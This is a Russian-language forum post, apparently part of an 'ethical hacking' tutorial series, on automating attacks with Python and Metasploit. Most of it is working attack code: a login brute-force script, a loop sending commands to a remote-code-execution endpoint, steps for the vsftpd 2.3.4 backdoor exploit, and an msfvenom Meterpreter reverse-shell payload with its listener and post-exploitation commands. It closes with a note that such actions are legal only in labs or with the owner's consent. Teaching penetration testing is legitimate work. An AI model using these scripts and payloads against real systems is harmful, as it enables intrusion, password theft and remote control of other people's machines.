HMCoba
Форумчанин
- Регистрация
- 14.06.2025
- Сообщения
- 20
- Реакции
- 26


Автоматизация атак с помощью Python и работа с Metasploit

- Часть 1 — Введение в этичный хакинг
- Часть 2 — Установка Kali Linux и создание тестовой среды
- Часть 3 — Тестирование уязвимостей веб-приложений
- Часть 4 — Продвинутые атаки и анализ окружения
- Часть 5 — Повышение привилегий: путь к root
- Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
- Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit

Ручное выполнение одних и тех же действий — медленно и неэффективно.
Скрипты на Python позволяют:
- Перебрать логины/пароли
- Автоматизировать поиск уязвимостей
- Подключаться к целям и загружать полезную нагрузку

Цель — отправить десятки логинов и паролей на сайт и посмотреть, сработает ли что-то.
Python:
import requests
url = "http://target.site/login"
user = "admin"
passwords = ["123456", "password", "admin123", "toor"]
for pwd in passwords:
data = {"username": user, "password": pwd}
r = requests.post(url, data=data)
if "Добро пожаловать" in r.text:
print(f"[+] Успешно: {user}:{pwd}")
break
else:
print(f"[-] Ошибка: {pwd}")


Если у вас есть уязвимость Remote Command Execution (например, через GET-параметр):
Python:
import requests
url = "http://target.site/vuln.php"
payloads = ["id", "whoami", "uname -a"]
for cmd in payloads:
r = requests.get(url, params={"cmd": cmd})
print(f"$ {cmd}\n{r.text.strip()}\n")
Это полезно для быстрого сбора системной информации.

Metasploit — один из главных инструментов пентестера. Он содержит сотни эксплойтов, сканеров и полезных загрузчиков.
Запуск Metasploit:
Код:
msfconsole
Откроется интерактивная консоль. Ниже — минимальный сценарий атаки.

1. Запустить консоль:
Код:
msfconsole
2. Найти эксплойт:
Код:
search vsftpd
3. Выбрать эксплойт:
Код:
use exploit/unix/ftp/vsftpd_234_backdoor
4. Указать цель:
Код:
set RHOSTS 192.168.1.10
5. Запустить:
Код:
run
Если успешно — будет открыт shell.

Код:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf

–
-p
— используемый payload–
LHOST/LPORT
— IP и порт атакующего–
-f elf
— формат для Linux–
> shell.elf
— сохранить в файлЗагрузите
shell.elf
на сервер и сделайте исполняемым:
Код:
chmod +x shell.elf
./shell.elf
На атакующей стороне запустите обработчик:
Код:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run


Код:
sysinfo — информация о системе
getuid — под кем мы сейчас
shell — перейти в обычный bash
upload file — загрузить файл
download file — скачать файл

- Как с помощью Python автоматизировать атаки на форму входа
- Как выполнять команды на удалённой машине через RCE
- Как использовать Metasploit и msfvenom
- Как сгенерировать шелл и подключиться через Meterpreter

Все действия допустимы только в рамках учебной среды или с прямого согласия владельца системы.
Несанкционированный доступ квалифицируется как преступление и может повлечь за собой уголовную ответственность.
Последнее редактирование: